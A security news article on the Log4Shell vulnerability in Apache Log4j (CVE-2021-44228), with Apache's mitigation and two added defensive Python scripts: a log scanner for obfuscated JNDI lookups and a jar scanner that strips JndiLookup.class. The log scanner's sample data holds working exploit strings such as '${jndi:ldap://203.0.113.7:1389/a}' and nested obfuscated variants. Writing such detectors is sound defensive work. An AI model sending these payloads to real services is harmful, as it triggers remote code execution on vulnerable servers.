
Critical ‘Log4Shell’ Zero-Day Vulnerability Wreaks Havoc Online


Neha Baruah

A critical vulnerability in the Apache Log4j library, a Java logging component bundled into an enormous number of applications, has shaken the internet. The flaw, now known as ‘Log4Shell’, is already being exploited and affects services including Twitter, iCloud, Apple, and Minecraft.

‘Log4Shell’ Zero-Day Vulnerability Has A Wide Attack Surface

Researchers have published details of a critical Apache Log4j vulnerability that affects a very large number of services.

Identified as CVE-2021-44228, and informally named ‘Log4Shell’ by LunaSec, the vulnerability is an unauthenticated remote code execution flaw in applications that use this Java logging library. Because the trigger is a specially crafted string reaching a log statement, any attacker-supplied input that an application logs (HTTP headers, usernames, chat messages, search terms) is a potential entry point, which is what makes the attack surface so wide.

A newly created GitHub repository lists affected products and services, including Apple, Amazon, Twitter, Tencent, Steam, Baidu, Cloudflare, Tesla, Ghidra, Google, WebEx, LinkedIn, and more. The vulnerability was first observed in the wild affecting Minecraft servers.

According to Apache’s official description, it is an RCE flaw: the JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI endpoints, so an attacker who can control log messages or log message parameters can execute arbitrary code loaded from an LDAP server when message lookup substitution is enabled, and thereby take control of the target server.

Apache has confirmed that this vulnerability affects Log4j 2 versions from 2.0-beta9 through 2.14.1.

Apache Deployed The Patches

Regrettably, CERT NZ has reported in an advisory that the bug is already being exploited in the wild.

Hence, it is imperative that users move to the latest Log4j release to get the fix. US-CERT (CISA) has also urged these updates in its recent advisory.
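Since the bug is being exploited in the wild, the first thing a defender wants is a way to spot exploitation attempts in web server logs. The following is an added example, not code from the original article or from Apache: it scans constructed Apache-style access log lines for Log4j lookup strings that resolve to a `${jndi:...}` lookup. Attackers commonly hide the `jndi` token behind nested `${lower:...}`, `${upper:...}` and `${...:-default}` lookups, so the detector first collapses those three lookup forms (an assumption: other lookup types such as `${env:...}` are left untouched) and then checks the result. The sample log lines are constructed for this example and do not come from any real incident.

```python
import re

# Innermost ${...} lookup, i.e. one whose body contains no further "${" or "}".
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup as Log4j would see it after substitution.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample log lines for this example: three exploitation attempts in
# common obfuscated forms (lines 0-2) and two benign requests (lines 3-4).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] '
    '"GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9/x} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "POST /api HTTP/1.1" 201 64 "-" "Mozilla/5.0 (price ${100})"',
]


def _resolve_inner(match):
    """Collapse one innermost lookup the way Log4j's substitution would:
    ${lower:X} -> x, ${upper:X} -> X, ${anything:-default} -> default.
    A jndi lookup is never rewritten, and anything else is left as-is."""
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return match.group(0)
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # Log4j default-value syntax: the variable is absent, so the default wins.
        return body[body.index(":-") + 2:]
    return match.group(0)


def normalize_lookups(text, max_rounds=10):
    """Repeatedly resolve innermost lookups until nothing changes (bounded so a
    pathological input cannot loop). Nested obfuscation unwraps from the inside out."""
    for _ in range(max_rounds):
        resolved = LOOKUP_RE.sub(_resolve_inner, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan_log_lines(lines):
    """Return (index, de-obfuscated line) for every line containing a JNDI lookup,
    checking both the raw line and its normalised form."""
    hits = []
    for i, line in enumerate(lines):
        decoded = normalize_lookups(line)
        if JNDI_RE.search(line) or JNDI_RE.search(decoded):
            hits.append((i, decoded))
    return hits


if __name__ == "__main__":
    for index, decoded in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {index}: {decoded}")
```

Run it against real access logs by replacing `SAMPLE_LOG_LINES` with the file contents; the de-obfuscated line is what you want in the alert, since it shows the callback host the attacker is trying to reach. Expect false negatives: this covers the three most common obfuscation forms, not every lookup Log4j supports.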

Specifically, Apache has released Log4j version 2.15.0 to address this vulnerability. For deployments that cannot upgrade immediately, Apache’s advisory also describes a mitigation, which reads,

In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
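The mitigation quoted above is a manual `zip -q -d` against one jar, but in practice log4j-core is often bundled several times on a host (inside application fat jars, appliance images, vendor plugins), so a practitioner wants a scanner that reads each jar's recorded version, checks it against the 2.0-beta9 to 2.14.1 range Apache gave, tells whether JndiLookup.class is still present, and can strip it. The code below is an added example written for this article, not Apache's tooling: it builds a constructed stand-in jar in memory (placeholder bytes, not real bytecode) so it runs offline, reads the version from the Maven `pom.properties` entry that log4j-core jars carry, and rewrites the archive without the class, which is the same effect as the `zip -q -d` command. The version parser assumes pre-release tags compare correctly as plain strings (beta9, rc1), which holds for Log4j 2's actual release history.

```python
import io
import re
import zipfile

# Paths inside log4j-core jars. The class path is the one named in Apache's
# mitigation; pom.properties is where Maven-built jars record their version.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

# Affected range as stated by Apache for CVE-2021-44228.
FIRST_AFFECTED = "2.0-beta9"
LAST_AFFECTED = "2.14.1"

_VER_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9]+))?$")


def version_key(version):
    """Sortable key for Log4j version strings such as 2.0-beta9, 2.10.0, 2.14.1.
    A pre-release tag sorts before the final release of the same number; tags
    are compared as plain strings (assumption: no beta10-style tags)."""
    m = _VER_RE.match(version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1, pre or "")


def is_vulnerable_version(version):
    """True if version lies inside the affected range 2.0-beta9 .. 2.14.1."""
    return version_key(FIRST_AFFECTED) <= version_key(version) <= version_key(LAST_AFFECTED)


def build_sample_jar(version):
    """Constructed stand-in for log4j-core-<version>.jar, built in memory for
    this example. Class entries hold placeholder bytes, not real bytecode."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def scan_jar(jar_bytes):
    """Report the version recorded in the jar, whether JndiLookup.class is present,
    and a status: vulnerable, mitigated (in range but class removed),
    outside_range, or unknown_version (no pom.properties; inspect by hand)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_CLASS in names
    if version is None:
        status = "unknown_version"
    elif not is_vulnerable_version(version):
        status = "outside_range"
    elif has_jndi:
        status = "vulnerable"
    else:
        status = "mitigated"
    return {"version": version, "has_jndi_lookup": has_jndi, "status": status}


def remove_jndi_lookup(jar_bytes):
    """Return a copy of the jar without JndiLookup.class, the same effect as
    'zip -q -d log4j-core-*.jar org/.../JndiLookup.class'. zipfile cannot delete
    in place, so every other entry is copied into a fresh archive."""
    src = zipfile.ZipFile(io.BytesIO(jar_bytes))
    out = io.BytesIO()
    with src, zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename == JNDI_CLASS:
                continue
            dst.writestr(info, src.read(info.filename))
    return out.getvalue()


if __name__ == "__main__":
    jar = build_sample_jar("2.14.1")
    print("before:", scan_jar(jar))
    print("after: ", scan_jar(remove_jndi_lookup(jar)))
```

To use it on a real host, feed `scan_jar` the bytes of every `log4j-core*.jar` found with `find / -name 'log4j-core*.jar'`, and remember that nested copies inside fat jars or WAR files need the outer archive opened first. A status of `mitigated` means the class is gone but the version is still in the affected range, so the jar should still be upgraded; `unknown_version` with `has_jndi_lookup` true should be treated as vulnerable until proven otherwise.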

Hence, given the active exploitation of the bug and the public availability of proof-of-concept exploits on Twitter and GitHub, users must update without delay. Note that 2.15.0 was later found to be an incomplete fix (CVE-2021-45046) and the formatMsgNoLookups mitigation insufficient in some configurations, so Apache went on to release 2.16.0 and 2.17.x; treat 2.15.0 as a floor rather than a destination. Because Log4j is frequently bundled transitively inside other jars and fat jars, inventory every copy of log4j-core on each host rather than only the one your own build declares.

Let us know your thoughts in the comments.
